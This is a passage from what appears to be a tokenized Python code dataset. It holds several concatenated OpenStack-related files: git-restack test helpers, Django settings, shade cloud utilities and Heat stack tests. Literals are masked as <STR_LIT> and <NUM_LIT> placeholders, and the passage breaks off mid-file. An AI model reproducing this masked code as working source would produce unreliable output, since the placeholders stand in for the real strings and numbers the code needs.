_run_git ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> gitreview = '<STR_LIT>' <EOL> self . _simple_change ( '<STR_LIT>' , gitreview , '<STR_LIT>' , <EOL> file_ = self . _dir ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _dir ( self , base , * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( getattr ( self , base + '<STR_LIT>' ) , * args ) <EOL> def _run_git ( self , dirname , command , * args ) : <EOL> """<STR_LIT>""" <EOL> if command == '<STR_LIT>' : <EOL> return utils . run_git ( command , args [ <NUM_LIT:0> ] , self . _dir ( dirname ) ) <EOL> return utils . run_git ( '<STR_LIT>' + self . _dir ( dirname , '<STR_LIT>' ) , <EOL> '<STR_LIT>' + self . _dir ( dirname ) , <EOL> command , * args ) <EOL> def _run_git_restack ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> git_restack = utils . 
run_cmd ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> kwargs . setdefault ( '<STR_LIT>' , self . local_dir ) <EOL> return utils . run_cmd ( git_restack , * args , ** kwargs ) <EOL> def _simple_change ( self , dirname , change_text , commit_message , <EOL> file_ = None ) : <EOL> """<STR_LIT>""" <EOL> if file_ is None : <EOL> file_ = self . _dir ( dirname , '<STR_LIT>' ) <EOL> utils . write_to_file ( file_ , change_text . encode ( ) ) <EOL> self . _run_git ( dirname , '<STR_LIT>' , file_ ) <EOL> self . _run_git ( dirname , '<STR_LIT>' , '<STR_LIT>' , commit_message ) <EOL> def _git_log ( self , dirname ) : <EOL> out = self . _run_git ( dirname , '<STR_LIT>' , '<STR_LIT>' ) <EOL> commits = [ ] <EOL> for line in out . split ( '<STR_LIT:\n>' ) : <EOL> commits . append ( line . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) ) <EOL> return commits </s>
<s> import os <EOL> PROJECT_PATH = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> SERVE_STATIC = True <EOL> SITE_ROOT = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> SITE_ID = <NUM_LIT:1> <EOL> STATIC_URL = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> AUTHENTICATION_BACKENDS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> OPENID_CREATE_USERS = True <EOL> OPENID_STRICT_USERNAMES = True <EOL> OPENID_REUSE_USERS = True <EOL> OPENID_UPDATE_DETAILS_FROM_SREG = True <EOL> OPENID_SSO_SERVER_URL = '<STR_LIT>' <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT:/>' <EOL> try : <EOL> from local_settings import * <EOL> except ImportError : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import uuid <EOL> def generate_uuid ( ) : <EOL> return str ( uuid . uuid4 ( ) ) <EOL> def is_uuid_like ( val ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return str ( uuid . UUID ( val ) ) == val <EOL> except ( TypeError , ValueError , AttributeError ) : <EOL> return False </s>
<s> from storyboardclient import base <EOL> from storyboardclient . v1 import users <EOL> class UsersNestedManager ( base . BaseNestedManager ) : <EOL> parent_url_key = "<STR_LIT>" <EOL> url_key = "<STR_LIT>" <EOL> resource_class = users . User <EOL> def add ( self , user ) : <EOL> if isinstance ( user , users . User ) : <EOL> user_id = user . id <EOL> else : <EOL> user_id = user <EOL> self . put ( id = user_id ) <EOL> def remove ( self , user ) : <EOL> if isinstance ( user , users . User ) : <EOL> user_id = user . id <EOL> else : <EOL> user_id = user <EOL> self . delete ( id = user_id ) <EOL> class Team ( base . BaseObject ) : <EOL> name = None <EOL> users = UsersNestedManager <EOL> class TeamsManager ( base . BaseManager ) : <EOL> url_key = "<STR_LIT>" <EOL> resource_class = Team </s>
<s> import argparse <EOL> import os <EOL> from releasetools import release_notes <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( <EOL> prog = '<STR_LIT>' , <EOL> description = __doc__ , <EOL> formatter_class = argparse . RawDescriptionHelpFormatter ) <EOL> parser . add_argument ( "<STR_LIT>" , metavar = '<STR_LIT:path>' , action = "<STR_LIT:store>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , metavar = '<STR_LIT>' , <EOL> action = "<STR_LIT:store>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , metavar = '<STR_LIT>' , <EOL> action = "<STR_LIT:store>" , <EOL> nargs = '<STR_LIT:?>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group = parser . add_argument_group ( '<STR_LIT>' ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group . 
add_argument ( <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> default = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> args = parser . parse_args ( ) <EOL> library_path = os . path . abspath ( args . library ) <EOL> notes = release_notes . generate_release_notes ( <EOL> library = args . library , <EOL> library_path = library_path , <EOL> start_revision = args . start_revision , <EOL> end_revision = args . end_revision , <EOL> show_dates = args . show_dates , <EOL> skip_requirement_merges = args . skip_requirement_merges , <EOL> is_stable = args . stable , <EOL> series = args . series , <EOL> email = args . email , <EOL> email_from = args . email_from , <EOL> email_to = args . email_to , <EOL> email_reply_to = args . email_reply_to , <EOL> email_tags = args . email_tags , <EOL> include_pypi_link = args . include_pypi_link , <EOL> changes_only = args . changes_only , <EOL> first_release = args . first_release , <EOL> ) <EOL> print ( notes . encode ( '<STR_LIT:utf-8>' ) ) <EOL> return <NUM_LIT:0> </s>
<s> import contextlib <EOL> import inspect <EOL> import munch <EOL> import netifaces <EOL> import re <EOL> import six <EOL> import time <EOL> from decorator import decorator <EOL> from heatclient import exc as heat_exc <EOL> from neutronclient . common import exceptions as neutron_exc <EOL> from shade import _log <EOL> from shade import exc <EOL> from shade import meta <EOL> log = _log . setup_logging ( __name__ ) <EOL> _decorated_methods = [ ] <EOL> def _iterate_timeout ( timeout , message , wait = <NUM_LIT:2> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> wait = float ( wait ) <EOL> except ValueError : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( wait = wait ) ) <EOL> start = time . time ( ) <EOL> count = <NUM_LIT:0> <EOL> while ( timeout is None ) or ( time . time ( ) < start + timeout ) : <EOL> count += <NUM_LIT:1> <EOL> yield count <EOL> log . debug ( '<STR_LIT>' . format ( wait = wait ) ) <EOL> time . sleep ( wait ) <EOL> raise exc . OpenStackCloudTimeout ( message ) <EOL> def _filter_list ( data , name_or_id , filters ) : <EOL> """<STR_LIT>""" <EOL> if name_or_id : <EOL> identifier_matches = [ ] <EOL> for e in data : <EOL> e_id = str ( e . get ( '<STR_LIT:id>' , None ) ) <EOL> e_name = e . get ( '<STR_LIT:name>' , None ) <EOL> if str ( name_or_id ) in ( e_id , e_name ) : <EOL> identifier_matches . append ( e ) <EOL> data = identifier_matches <EOL> if not filters : <EOL> return data <EOL> def _dict_filter ( f , d ) : <EOL> if not d : <EOL> return False <EOL> for key in f . keys ( ) : <EOL> if isinstance ( f [ key ] , dict ) : <EOL> if not _dict_filter ( f [ key ] , d . get ( key , None ) ) : <EOL> return False <EOL> elif d . get ( key , None ) != f [ key ] : <EOL> return False <EOL> return True <EOL> filtered = [ ] <EOL> for e in data : <EOL> filtered . append ( e ) <EOL> for key in filters . keys ( ) : <EOL> if isinstance ( filters [ key ] , dict ) : <EOL> if not _dict_filter ( filters [ key ] , e . 
get ( key , None ) ) : <EOL> filtered . pop ( ) <EOL> break <EOL> elif e . get ( key , None ) != filters [ key ] : <EOL> filtered . pop ( ) <EOL> break <EOL> return filtered <EOL> def _get_entity ( func , name_or_id , filters , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( name_or_id , '<STR_LIT:id>' ) : <EOL> return name_or_id <EOL> entities = func ( name_or_id , filters , ** kwargs ) <EOL> if not entities : <EOL> return None <EOL> if len ( entities ) > <NUM_LIT:1> : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" % name_or_id ) <EOL> return entities [ <NUM_LIT:0> ] <EOL> def normalize_servers ( servers , cloud_name , region_name ) : <EOL> ret = [ ] <EOL> for server in servers : <EOL> ret . append ( normalize_server ( server , cloud_name , region_name ) ) <EOL> return ret <EOL> def normalize_server ( server , cloud_name , region_name ) : <EOL> server . pop ( '<STR_LIT>' , None ) <EOL> server [ '<STR_LIT>' ] . pop ( '<STR_LIT>' , None ) <EOL> if str ( server [ '<STR_LIT:image>' ] ) != server [ '<STR_LIT:image>' ] : <EOL> server [ '<STR_LIT:image>' ] . pop ( '<STR_LIT>' , None ) <EOL> server [ '<STR_LIT>' ] = region_name <EOL> server [ '<STR_LIT>' ] = cloud_name <EOL> az = server . get ( '<STR_LIT>' , None ) <EOL> if az : <EOL> server [ '<STR_LIT>' ] = az <EOL> server [ '<STR_LIT>' ] = [ ] <EOL> return server <EOL> def normalize_keystone_services ( services ) : <EOL> """<STR_LIT>""" <EOL> ret = [ ] <EOL> for service in services : <EOL> service_type = service . get ( '<STR_LIT:type>' , service . get ( '<STR_LIT>' ) ) <EOL> new_service = { <EOL> '<STR_LIT:id>' : service [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:name>' : service [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : service . get ( '<STR_LIT:description>' , None ) , <EOL> '<STR_LIT:type>' : service_type , <EOL> '<STR_LIT>' : service_type , <EOL> '<STR_LIT>' : service [ '<STR_LIT>' ] <EOL> } <EOL> ret . append ( new_service ) <EOL> return meta . 
obj_list_to_dict ( ret ) <EOL> def normalize_nova_secgroups ( groups ) : <EOL> """<STR_LIT>""" <EOL> ret = [ { '<STR_LIT:id>' : g [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:name>' : g [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : g [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : normalize_nova_secgroup_rules ( g [ '<STR_LIT>' ] ) <EOL> } for g in groups ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_nova_secgroup_rules ( rules ) : <EOL> """<STR_LIT>""" <EOL> ret = [ { '<STR_LIT:id>' : r [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> None if r [ '<STR_LIT>' ] == - <NUM_LIT:1> else r [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> None if r [ '<STR_LIT>' ] == - <NUM_LIT:1> else r [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : r [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : r [ '<STR_LIT>' ] . get ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : r [ '<STR_LIT>' ] <EOL> } for r in rules ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_nova_floating_ips ( ips ) : <EOL> """<STR_LIT>""" <EOL> ret = [ dict ( <EOL> id = ip [ '<STR_LIT:id>' ] , <EOL> fixed_ip_address = ip . get ( '<STR_LIT>' ) , <EOL> floating_ip_address = ip [ '<STR_LIT>' ] , <EOL> network = ip [ '<STR_LIT>' ] , <EOL> attached = ( ip . get ( '<STR_LIT>' ) is not None and <EOL> ip . get ( '<STR_LIT>' ) != '<STR_LIT>' ) , <EOL> status = '<STR_LIT>' <EOL> ) for ip in ips ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_neutron_floating_ips ( ips ) : <EOL> """<STR_LIT>""" <EOL> ret = [ ] <EOL> for ip in ips : <EOL> network_id = ip . get ( '<STR_LIT>' , ip . get ( '<STR_LIT>' ) ) <EOL> ret . append ( dict ( <EOL> id = ip [ '<STR_LIT:id>' ] , <EOL> fixed_ip_address = ip . get ( '<STR_LIT>' ) , <EOL> floating_ip_address = ip [ '<STR_LIT>' ] , <EOL> network = network_id , <EOL> floating_network_id = network_id , <EOL> port_id = ip . get ( '<STR_LIT>' ) , <EOL> router_id = ip . 
get ( '<STR_LIT>' ) , <EOL> attached = ( ip . get ( '<STR_LIT>' ) is not None and <EOL> ip . get ( '<STR_LIT>' ) != '<STR_LIT>' ) , <EOL> status = ip [ '<STR_LIT:status>' ] , <EOL> ) ) <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def localhost_supports_ipv6 ( ) : <EOL> """<STR_LIT>""" <EOL> return netifaces . AF_INET6 in netifaces . gateways ( ) [ '<STR_LIT:default>' ] <EOL> def normalize_users ( users ) : <EOL> ret = [ <EOL> dict ( <EOL> id = user . get ( '<STR_LIT:id>' ) , <EOL> email = user . get ( '<STR_LIT:email>' ) , <EOL> name = user . get ( '<STR_LIT:name>' ) , <EOL> username = user . get ( '<STR_LIT:username>' ) , <EOL> default_project_id = user . get ( '<STR_LIT>' , <EOL> user . get ( '<STR_LIT>' ) ) , <EOL> domain_id = user . get ( '<STR_LIT>' ) , <EOL> enabled = user . get ( '<STR_LIT>' ) , <EOL> ) for user in users <EOL> ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_volumes ( volumes ) : <EOL> ret = [ ] <EOL> for vol in volumes : <EOL> new_vol = vol . copy ( ) <EOL> name = vol . get ( '<STR_LIT:name>' , vol . get ( '<STR_LIT>' ) ) <EOL> description = vol . get ( '<STR_LIT:description>' , vol . get ( '<STR_LIT>' ) ) <EOL> new_vol [ '<STR_LIT:name>' ] = name <EOL> new_vol [ '<STR_LIT>' ] = name <EOL> new_vol [ '<STR_LIT:description>' ] = description <EOL> new_vol [ '<STR_LIT>' ] = description <EOL> for field in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if field in new_vol and isinstance ( new_vol [ field ] , <EOL> six . string_types ) : <EOL> if new_vol [ field ] is not None : <EOL> if new_vol [ field ] . lower ( ) == '<STR_LIT:true>' : <EOL> new_vol [ field ] = True <EOL> elif new_vol [ field ] . lower ( ) == '<STR_LIT:false>' : <EOL> new_vol [ field ] = False <EOL> ret . append ( new_vol ) <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_domains ( domains ) : <EOL> ret = [ <EOL> dict ( <EOL> id = domain . get ( '<STR_LIT:id>' ) , <EOL> name = domain . get ( '<STR_LIT:name>' ) , <EOL> description = domain . 
get ( '<STR_LIT:description>' ) , <EOL> enabled = domain . get ( '<STR_LIT>' ) , <EOL> ) for domain in domains <EOL> ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_groups ( domains ) : <EOL> """<STR_LIT>""" <EOL> ret = [ <EOL> dict ( <EOL> id = domain . get ( '<STR_LIT:id>' ) , <EOL> name = domain . get ( '<STR_LIT:name>' ) , <EOL> description = domain . get ( '<STR_LIT:description>' ) , <EOL> domain_id = domain . get ( '<STR_LIT>' ) , <EOL> ) for domain in domains <EOL> ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_role_assignments ( assignments ) : <EOL> """<STR_LIT>""" <EOL> new_assignments = [ ] <EOL> for assignment in assignments : <EOL> new_val = munch . Munch ( { '<STR_LIT:id>' : assignment [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] } ) <EOL> for scope in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if scope in assignment [ '<STR_LIT>' ] : <EOL> new_val [ scope ] = assignment [ '<STR_LIT>' ] [ scope ] [ '<STR_LIT:id>' ] <EOL> for assignee in ( '<STR_LIT:user>' , '<STR_LIT>' ) : <EOL> if assignee in assignment : <EOL> new_val [ assignee ] = assignment [ assignee ] [ '<STR_LIT:id>' ] <EOL> new_assignments . append ( new_val ) <EOL> return new_assignments <EOL> def normalize_roles ( roles ) : <EOL> """<STR_LIT>""" <EOL> ret = [ <EOL> dict ( <EOL> id = role . get ( '<STR_LIT:id>' ) , <EOL> name = role . get ( '<STR_LIT:name>' ) , <EOL> ) for role in roles <EOL> ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_stacks ( stacks ) : <EOL> """<STR_LIT>""" <EOL> for stack in stacks : <EOL> stack [ '<STR_LIT:name>' ] = stack [ '<STR_LIT>' ] <EOL> return stacks <EOL> def normalize_flavors ( flavors ) : <EOL> """<STR_LIT>""" <EOL> for flavor in flavors : <EOL> flavor . pop ( '<STR_LIT>' , None ) <EOL> flavor . pop ( '<STR_LIT>' , None ) <EOL> flavor . pop ( '<STR_LIT>' , None ) <EOL> flavor . pop ( '<STR_LIT>' , None ) <EOL> if '<STR_LIT>' not in flavor : <EOL> flavor [ '<STR_LIT>' ] = { } <EOL> ephemeral = flavor . 
pop ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> is_public = flavor . pop ( '<STR_LIT>' , True ) <EOL> flavor [ '<STR_LIT>' ] = ephemeral <EOL> flavor [ '<STR_LIT>' ] = ephemeral <EOL> flavor [ '<STR_LIT>' ] = is_public <EOL> flavor [ '<STR_LIT>' ] = is_public <EOL> return flavors <EOL> def valid_kwargs ( * valid_args ) : <EOL> @ decorator <EOL> def func_wrapper ( func , * args , ** kwargs ) : <EOL> argspec = inspect . getargspec ( func ) <EOL> for k in kwargs : <EOL> if k not in argspec . args [ <NUM_LIT:1> : ] and k not in valid_args : <EOL> raise TypeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( f = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:3> ] , arg = k ) ) <EOL> return func ( * args , ** kwargs ) <EOL> return func_wrapper <EOL> def cache_on_arguments ( * cache_on_args , ** cache_on_kwargs ) : <EOL> def _inner_cache_on_arguments ( func ) : <EOL> def _cache_decorator ( obj , * args , ** kwargs ) : <EOL> the_method = obj . _cache . cache_on_arguments ( <EOL> * cache_on_args , ** cache_on_kwargs ) ( <EOL> func . __get__ ( obj , type ( obj ) ) ) <EOL> return the_method ( * args , ** kwargs ) <EOL> def invalidate ( obj , * args , ** kwargs ) : <EOL> return obj . _cache . cache_on_arguments ( ) ( func ) . invalidate ( <EOL> * args , ** kwargs ) <EOL> _cache_decorator . invalidate = invalidate <EOL> _cache_decorator . func = func <EOL> _decorated_methods . append ( func . __name__ ) <EOL> return _cache_decorator <EOL> return _inner_cache_on_arguments <EOL> @ contextlib . contextmanager <EOL> def heat_exceptions ( error_message ) : <EOL> try : <EOL> yield <EOL> except heat_exc . NotFound as e : <EOL> raise exc . OpenStackCloudResourceNotFound ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> except Exception as e : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> @ contextlib . 
contextmanager <EOL> def neutron_exceptions ( error_message ) : <EOL> try : <EOL> yield <EOL> except neutron_exc . NotFound as e : <EOL> raise exc . OpenStackCloudResourceNotFound ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> except neutron_exc . NeutronClientException as e : <EOL> if e . status_code == <NUM_LIT> : <EOL> raise exc . OpenStackCloudURINotFound ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> else : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> except Exception as e : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> @ contextlib . contextmanager <EOL> def shade_exceptions ( error_message = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> yield <EOL> except exc . OpenStackCloudException : <EOL> raise <EOL> except Exception as e : <EOL> if error_message is None : <EOL> error_message = str ( e ) <EOL> raise exc . OpenStackCloudException ( error_message ) <EOL> def safe_dict_min ( key , data ) : <EOL> """<STR_LIT>""" <EOL> min_value = None <EOL> for d in data : <EOL> if ( key in d ) and ( d [ key ] is not None ) : <EOL> try : <EOL> val = int ( d [ key ] ) <EOL> except ValueError : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> key = key , value = d [ key ] ) <EOL> ) <EOL> if ( min_value is None ) or ( val < min_value ) : <EOL> min_value = val <EOL> return min_value <EOL> def safe_dict_max ( key , data ) : <EOL> """<STR_LIT>""" <EOL> max_value = None <EOL> for d in data : <EOL> if ( key in d ) and ( d [ key ] is not None ) : <EOL> try : <EOL> val = int ( d [ key ] ) <EOL> except ValueError : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . 
format ( <EOL> key = key , value = d [ key ] ) <EOL> ) <EOL> if ( max_value is None ) or ( val > max_value ) : <EOL> max_value = val <EOL> return max_value <EOL> def parse_range ( value ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> return None <EOL> range_exp = re . match ( '<STR_LIT>' , value ) <EOL> if range_exp is None : <EOL> return None <EOL> op = range_exp . group ( <NUM_LIT:1> ) <EOL> num = int ( range_exp . group ( <NUM_LIT:2> ) ) <EOL> return ( op , num ) <EOL> def range_filter ( data , key , range_exp ) : <EOL> """<STR_LIT>""" <EOL> filtered = [ ] <EOL> range_exp = str ( range_exp ) . upper ( ) <EOL> if range_exp == "<STR_LIT>" : <EOL> key_min = safe_dict_min ( key , data ) <EOL> if key_min is None : <EOL> return [ ] <EOL> for d in data : <EOL> if int ( d [ key ] ) == key_min : <EOL> filtered . append ( d ) <EOL> return filtered <EOL> elif range_exp == "<STR_LIT>" : <EOL> key_max = safe_dict_max ( key , data ) <EOL> if key_max is None : <EOL> return [ ] <EOL> for d in data : <EOL> if int ( d [ key ] ) == key_max : <EOL> filtered . append ( d ) <EOL> return filtered <EOL> val_range = parse_range ( range_exp ) <EOL> if val_range is None : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" . format ( value = range_exp ) ) <EOL> op = val_range [ <NUM_LIT:0> ] <EOL> if op : <EOL> for d in data : <EOL> d_val = int ( d [ key ] ) <EOL> if op == '<STR_LIT:<>' : <EOL> if d_val < val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> elif op == '<STR_LIT:>>' : <EOL> if d_val > val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> elif op == '<STR_LIT>' : <EOL> if d_val <= val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> elif op == '<STR_LIT>' : <EOL> if d_val >= val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> return filtered <EOL> else : <EOL> for d in data : <EOL> if int ( d [ key ] ) == val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> return filtered </s>
<s> """<STR_LIT>""" <EOL> import tempfile <EOL> from shade import exc <EOL> from shade import openstack_cloud <EOL> from shade . tests import base <EOL> simple_template = '''<STR_LIT>''' <EOL> root_template = '''<STR_LIT>''' <EOL> environment = '''<STR_LIT>''' <EOL> validate_template = '''<STR_LIT>''' <EOL> class TestStack ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestStack , self ) . setUp ( ) <EOL> self . cloud = openstack_cloud ( cloud = '<STR_LIT>' ) <EOL> if not self . cloud . has_service ( '<STR_LIT>' ) : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> def _cleanup_stack ( self ) : <EOL> self . cloud . delete_stack ( self . stack_name , wait = True ) <EOL> self . assertIsNone ( self . cloud . get_stack ( self . stack_name ) ) <EOL> def test_stack_validation ( self ) : <EOL> test_template = tempfile . NamedTemporaryFile ( delete = False ) <EOL> test_template . write ( validate_template ) <EOL> test_template . close ( ) <EOL> stack_name = self . getUniqueString ( '<STR_LIT>' ) <EOL> self . assertRaises ( exc . OpenStackCloudException , <EOL> self . cloud . create_stack , <EOL> name = stack_name , <EOL> template_file = test_template . name ) <EOL> def test_stack_simple ( self ) : <EOL> test_template = tempfile . NamedTemporaryFile ( delete = False ) <EOL> test_template . write ( simple_template ) <EOL> test_template . close ( ) <EOL> self . stack_name = self . getUniqueString ( '<STR_LIT>' ) <EOL> self . addCleanup ( self . _cleanup_stack ) <EOL> stack = self . cloud . create_stack ( name = self . stack_name , <EOL> template_file = test_template . name , <EOL> wait = True ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> rand = stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( <NUM_LIT:10> , len ( rand ) ) <EOL> stack = self . cloud . get_stack ( self . stack_name ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> self . 
assertEqual ( rand , stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> stacks = self . cloud . list_stacks ( ) <EOL> stack_ids = [ s [ '<STR_LIT:id>' ] for s in stacks ] <EOL> self . assertIn ( stack [ '<STR_LIT:id>' ] , stack_ids ) <EOL> stack = self . cloud . update_stack ( self . stack_name , <EOL> template_file = test_template . name , <EOL> wait = True ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> rand = stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( rand , stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> stack = self . cloud . update_stack ( self . stack_name , <EOL> template_file = test_template . name , <EOL> wait = True , <EOL> length = <NUM_LIT:12> ) <EOL> stack = self . cloud . get_stack ( self . stack_name ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> new_rand = stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> self . assertNotEqual ( rand , new_rand ) <EOL> self . assertEqual ( <NUM_LIT:12> , len ( new_rand ) ) <EOL> def test_stack_nested ( self ) : <EOL> test_template = tempfile . NamedTemporaryFile ( <EOL> suffix = '<STR_LIT>' , delete = False ) <EOL> test_template . write ( root_template ) <EOL> test_template . close ( ) <EOL> simple_tmpl = tempfile . NamedTemporaryFile ( suffix = '<STR_LIT>' , delete = False ) <EOL> simple_tmpl . write ( simple_template ) <EOL> simple_tmpl . close ( ) <EOL> env = tempfile . NamedTemporaryFile ( suffix = 